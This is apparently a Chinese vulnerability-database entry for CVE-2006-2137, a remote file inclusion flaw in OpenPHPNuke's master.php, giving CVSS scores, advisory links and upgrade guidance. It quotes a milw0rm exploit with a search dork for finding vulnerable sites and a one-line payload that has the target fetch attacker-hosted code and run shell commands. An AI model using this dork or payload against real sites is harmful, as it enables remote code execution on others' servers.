CVE-2006-2137
CVSS7.5
发布时间 :2006-05-02 06:02:00
修订时间 :2011-03-07 21:35:25
NMCOE    

[原文]PHP remote file inclusion vulnerability in master.php in OpenPHPNuke and 2.3.3 earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.


[CNNVD]OpenPHPNuke master.php PHP远程文件包含漏洞(CNNVD-200605-029)

        OpenPHPNuke 及 2.3.3 之前版本的master.php存在PHP远程文件包含漏洞,远程攻击者可以通过root_path参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-029
(官方数据源) CNNVD

- 其它链接及资源

http://www.openphpnuke.com/system/article/index.php?opnparams=B3YBZAI3BWgEbFU0
(PATCH)  CONFIRM  http://www.openphpnuke.com/system/article/index.php?opnparams=B3YBZAI3BWgEbFU0
http://www.vupen.com/english/advisories/2006/1575
(UNKNOWN)  VUPEN  ADV-2006-1575
http://secunia.com/advisories/19893
(VENDOR_ADVISORY)  SECUNIA  19893
http://milw0rm.com/exploits/1727
(UNKNOWN)  MILW0RM  1727
http://xforce.iss.net/xforce/xfdb/26183
(UNKNOWN)  XF  openphpnuke-master-file-include(26183)
http://www.securityfocus.com/bid/17772
(UNKNOWN)  BID  17772
http://www.osvdb.org/25140
(UNKNOWN)  OSVDB  25140

- 漏洞信息

OpenPHPNuke master.php PHP远程文件包含漏洞
高危 输入验证
2006-05-02 00:00:00 2006-05-02 00:00:00
远程  
        OpenPHPNuke 及 2.3.3 之前版本的master.php存在PHP远程文件包含漏洞,远程攻击者可以通过root_path参数中的URL执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        OpenPHPnuke OpenPHPnuke 2.3.3
        OpenPHPnuke master.zip
        http://www.openphpnuke.info/files/master.zip

- 漏洞信息 (1727)

OpenPHPNuke <= 2.3.3 Remote File Inclusion Vulnerability (EDBID:1727)
php webapps
2006-04-29 Verified
0 [Oo]
N/A [点击下载]
Title: OpenPHPNuke <= 2.3.3 Remote File Inclusion
URL: http://www.openphpnuke.com/
Dork: inurl:/system/article/alltopics.php OR inurl:/system/user/index.php
Credits: [Oo]

Exploit: /master.php?root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]
		

- 漏洞信息

25140
OpenPHPNuke master.php root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

OpenPHPNuke contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to master.php not properly sanitizing user input supplied to the 'root_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-29 Unknow
2006-04-29 Unknow

- 解决方案

Upgrade to version 2.3.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站